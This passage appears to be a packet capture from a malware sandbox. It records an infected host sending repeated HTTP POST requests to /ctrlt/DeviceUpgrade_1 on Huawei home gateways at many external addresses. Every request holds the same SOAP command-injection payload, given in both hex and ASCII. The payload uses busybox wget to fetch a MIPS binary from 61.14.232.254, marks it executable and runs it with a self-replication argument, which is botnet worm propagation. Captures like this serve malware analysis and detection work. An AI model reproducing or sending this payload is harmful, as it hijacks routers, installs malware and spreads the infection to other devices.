                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  109192.168.2.13480561.61.137.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654213905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  110192.168.2.1344032197.60.10.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654222012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  111192.168.2.1344892213.3.221.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654253960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  112192.168.2.135863241.49.0.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654284000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  113192.168.2.1358472157.205.187.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654310942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  114192.168.2.1350304112.145.229.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654339075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  115192.168.2.133395041.10.116.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654369116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  116192.168.2.1348188157.151.201.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654397011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  117192.168.2.1336194157.118.146.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654432058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  118192.168.2.134333666.93.247.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654500008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 